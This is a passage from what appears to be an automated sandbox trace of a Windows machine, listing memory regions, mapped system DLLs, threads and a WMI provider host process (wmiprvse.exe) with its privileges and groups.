private name = "private_0x00000000010c0000" filename = "" Region: id = 1343 start_va = 0x1140000 end_va = 0x11bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 1344 start_va = 0x77060000 end_va = 0x77159fff monitored = 0 entry_point = 0x7707a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1345 start_va = 0x77160000 end_va = 0x7727efff monitored = 0 entry_point = 0x77175340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1346 start_va = 0x77280000 end_va = 0x77428fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1347 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1348 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1349 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1350 start_va = 0x13f720000 end_va = 0x13f78bfff monitored = 0 entry_point = 0x13f75b450 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 1351 start_va = 0x7fef2be0000 end_va = 0x7fef2c2dfff monitored = 0 entry_point = 0x7fef2be1198 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll") Region: id = 1352 start_va = 0x7fef6570000 end_va = 0x7fef65f5fff monitored = 1 entry_point = 0x7fef657ffd0 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1353 start_va = 0x7fef6600000 end_va = 0x7fef663bfff monitored = 1 entry_point = 0x7fef6625aa8 region_type = mapped_file name = "wmiprov.dll" filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll") Region: id = 1354 start_va = 0x7fef8f60000 end_va = 0x7fef8f71fff monitored = 0 entry_point = 0x7fef8f689d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1355 start_va = 0x7fef9120000 end_va = 0x7fef9140fff monitored = 0 entry_point = 0x7fef91303b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1356 start_va = 0x7fef9240000 end_va = 0x7fef9252fff monitored = 0 entry_point = 0x7fef9241d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1357 start_va = 0x7fef9520000 end_va = 0x7fef952dfff monitored = 0 entry_point = 0x7fef9525500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1358 start_va = 0x7fef9530000 end_va = 0x7fef9556fff monitored = 0 entry_point = 0x7fef95311a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1359 start_va = 0x7fef9560000 end_va = 0x7fef9632fff monitored = 0 entry_point = 0x7fef95d8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1360 start_va = 0x7fef97c0000 end_va = 0x7fef9836fff monitored = 1 entry_point = 0x7fef97fe7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1361 start_va = 0x7fef98c0000 end_va = 0x7fef98e4fff monitored = 1 entry_point = 0x7fef98d8d6c region_type = mapped_file name = "wmiperfclass.dll" filename = "\\Windows\\System32\\wbem\\WmiPerfClass.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiperfclass.dll") Region: id = 1362 start_va = 0x7fefb250000 end_va = 0x7fefb27cfff monitored = 0 entry_point = 0x7fefb251010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1363 start_va = 0x7fefc7c0000 end_va = 0x7fefc806fff monitored = 0 entry_point = 0x7fefc7c1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1364 start_va = 0x7fefcac0000 end_va = 0x7fefcad7fff monitored = 0 entry_point = 0x7fefcac3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1365 start_va = 0x7fefcc30000 end_va = 0x7fefcc51fff monitored = 0 entry_point = 0x7fefcc35d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1366 start_va = 0x7fefccf0000 end_va = 0x7fefcd5cfff monitored = 0 entry_point = 0x7fefccf1010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1367 start_va = 0x7fefd0c0000 end_va = 0x7fefd0cefff monitored = 0 entry_point = 0x7fefd0c1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1368 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c3fff monitored = 0 entry_point = 0x7fefd1b10e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1369 start_va = 0x7fefd4d0000 end_va = 0x7fefd53bfff monitored = 0 entry_point = 0x7fefd4d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1370 start_va = 0x7fefd5a0000 end_va = 0x7fefd6ccfff monitored = 0 entry_point = 0x7fefd5eed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1371 start_va = 0x7fefd6d0000 end_va = 0x7fefd721fff monitored = 0 entry_point = 0x7fefd6d10d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1372 start_va = 0x7fefd730000 end_va = 0x7fefd932fff monitored = 0 entry_point = 0x7fefd753330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1373 start_va = 0x7fefd940000 end_va = 0x7fefd94dfff monitored = 0 entry_point = 0x7fefd941080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1374 start_va = 0x7fefdd50000 end_va = 0x7fefde18fff monitored = 0 entry_point = 0x7fefddca874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1375 start_va = 0x7fefebb0000 end_va = 0x7fefec4efff monitored = 0 entry_point = 0x7fefebb25a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1376 start_va = 0x7fefec50000 end_va = 0x7fefec7dfff monitored = 0 entry_point = 0x7fefec51010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1377 start_va = 0x7fefed00000 end_va = 0x7fefed66fff monitored = 0 entry_point = 0x7fefed0b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1378 start_va = 0x7fefed70000 end_va = 0x7fefed77fff monitored = 0 entry_point = 0x7fefed71504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1379 start_va = 0x7fefed80000 end_va = 0x7fefee88fff monitored = 0 entry_point = 0x7fefed81064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1380 start_va = 0x7feff060000 end_va = 0x7feff13afff monitored = 0 entry_point = 0x7feff080760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1381 start_va = 0x7feff140000 end_va = 0x7feff1d8fff monitored = 0 entry_point = 0x7feff141c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1382 start_va = 0x7feff1e0000 end_va = 0x7feff1fefff monitored = 0 entry_point = 0x7feff1e60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1383 start_va = 0x7feff280000 end_va = 0x7feff2ccfff monitored = 0 entry_point = 0x7feff281070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1384 start_va = 0x7feff2d0000 end_va = 0x7feff3a6fff monitored = 0 entry_point = 0x7feff2d3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1385 start_va = 0x7feff5a0000 end_va = 0x7feff5a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1386 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1387 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1388 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1389 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1390 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1391 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1392 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1393 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1394 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1395 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1402 start_va = 0x1200000 end_va = 0x127ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Thread: id = 71 os_tid = 0x7cc Thread: id = 72 os_tid = 0x64 [0130.992] DllCanUnloadNow () returned 0x1 [0130.993] DllCanUnloadNow () returned 0x1 [0251.006] DllCanUnloadNow () returned 0x1 [0251.006] DllCanUnloadNow () returned 0x1 Thread: id = 73 os_tid = 0x770 Thread: id = 74 os_tid = 0x44c Thread: id = 75 os_tid = 0x7bc Thread: id = 76 os_tid = 0x578 Thread: id = 77 os_tid = 0x600 Thread: id = 78 os_tid = 0x698 Thread: id = 98 os_tid = 0xf60 Process: id = "5" image_name = "wmiprvse.exe" filename = "c:\\windows\\syswow64\\wbem\\wmiprvse.exe" page_root = "0x40d75000" os_pid = "0xf0c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Local Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0006c498" [0xc000000f] Region: id = 1006 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1007 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1008 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1009 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1010 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1011 start_va = 0x70000 end_va = 0xaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1012 start_va = 0x130000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1013 start_va = 0xd20000 end_va = 0xd79fff monitored = 0 entry_point = 0xd5a810 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmiprvse.exe") Region: id = 1014 start_va = 0x77280000 end_va = 0x77428fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1015 start_va = 0x77460000 end_va = 0x775dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1016 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1017 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1018 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1019 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1020 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1021 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1022 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1023 start_va = 0x2c0000 end_va = 0x33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 1024 start_va = 0x73b80000 end_va = 0x73b87fff monitored = 0 entry_point = 0x73b820f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1025 start_va = 0x73b90000 end_va = 0x73bebfff monitored = 0 entry_point = 0x73bcf9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1026 start_va = 0x73bf0000 end_va = 0x73c2efff monitored = 0 entry_point = 0x73c1e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1027 start_va = 0x77160000 end_va = 0x7727efff monitored = 0 entry_point = 0x77175340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1028 start_va = 0x75130000 end_va = 0x7523ffff monitored = 0 entry_point = 0x75143283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1029 start_va = 0x77160000 end_va = 0x7727efff monitored = 0 entry_point = 0x77175340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1030 start_va = 0x77160000 end_va = 0x7727efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077160000" filename = "" Region: id = 1031 start_va = 0x77060000 end_va = 0x77159fff monitored = 0 entry_point = 0x7707a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1032 start_va = 0x77060000 end_va = 0x77159fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077060000" filename = "" Region: id = 1033 start_va = 0x340000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1034 start_va = 0x75130000 end_va = 0x7523ffff monitored = 0 entry_point = 0x75143283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1035 start_va = 0x75040000 end_va = 0x75086fff monitored = 0 entry_point = 0x750474c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1036 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1037 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1038 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1039 start_va = 0xb0000 end_va = 0x116fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1040 start_va = 0x75810000 end_va = 0x7590ffff monitored = 0 entry_point = 0x7582b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1041 start_va = 0x75a40000 end_va = 0x75acffff monitored = 0 entry_point = 0x75a56343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1042 start_va = 0x75400000 end_va = 0x75409fff monitored = 0 entry_point = 0x754036a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1043 start_va = 0x76120000 end_va = 0x761bcfff monitored = 0 entry_point = 0x76153fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1044 start_va = 0x75600000 end_va = 0x756abfff monitored = 0 entry_point = 0x7560a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1045 start_va = 0x75910000 end_va = 0x759affff monitored = 0 entry_point = 0x759249e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1046 start_va = 0x76e10000 end_va = 0x76e28fff monitored = 0 entry_point = 0x76e14975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1047 start_va = 0x75c60000 end_va = 0x75d4ffff monitored = 0 entry_point = 0x75c70569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1048 start_va = 0x74fb0000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74fca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1049 start_va = 0x74fa0000 end_va = 0x74fabfff monitored = 0 entry_point = 0x74fa10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1050 start_va = 0x76030000 end_va = 0x760befff monitored = 0 entry_point = 0x76033fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1051 start_va = 0x756b0000 end_va = 0x7580bfff monitored = 0 entry_point = 0x756fba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1052 start_va = 0x723a0000 end_va = 0x72445fff monitored = 0 entry_point = 0x7240a2f0 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 1053 start_va = 0x74e20000 end_va = 0x74e80fff monitored = 1 entry_point = 0x74e5bf40 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\SysWOW64\\wbemcomn2.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn2.dll") Region: id = 1054 start_va = 0x74e00000 end_va = 0x74e16fff monitored = 0 entry_point = 0x74e035fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1055 start_va = 0x75090000 end_va = 0x750c4fff monitored = 0 entry_point = 0x7509145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1056 start_va = 0x77430000 end_va = 0x77435fff monitored = 0 entry_point = 0x77431782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1057 start_va = 0x74dd0000 end_va = 0x74de7fff monitored = 0 entry_point = 0x74dd1335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\SysWOW64\\ntdsapi.dll" (normalized: "c:\\windows\\syswow64\\ntdsapi.dll") Region: id = 1058 start_va = 0x74dc0000 end_va = 0x74dcefff monitored = 0 entry_point = 0x74dc7f10 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\SysWOW64\\ncobjapi.dll" (normalized: "c:\\windows\\syswow64\\ncobjapi.dll") Region: id = 1059 start_va = 0x170000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1060 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1061 start_va = 0x590000 end_va = 0x717fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1062 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1063 start_va = 0x755a0000 end_va = 0x755fffff monitored = 0 entry_point = 0x755b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1064 start_va = 0x75240000 end_va = 0x7530bfff monitored = 0 entry_point = 0x7524168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1065 start_va = 0x340000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1066 start_va = 0x490000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1067 start_va = 0x720000 end_va = 0x8a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 1068 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1069 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1070 start_va = 0x8b0000 end_va = 0x96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 1071 start_va = 0x970000 end_va = 0xc3efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1072 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 1073 start_va = 0x740f0000 end_va = 0x74110fff monitored = 0 entry_point = 0x740f145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1074 start_va = 0x75550000 end_va = 0x75594fff monitored = 0 entry_point = 0x755511e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 1075 start_va = 0x270000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1076 start_va = 0xc40000 end_va = 0xc7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 1077 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1078 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 1079 start_va = 0x220000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 1080 start_va = 0xdc0000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 1081 start_va = 0xe10000 end_va = 0xe4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 1082 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" 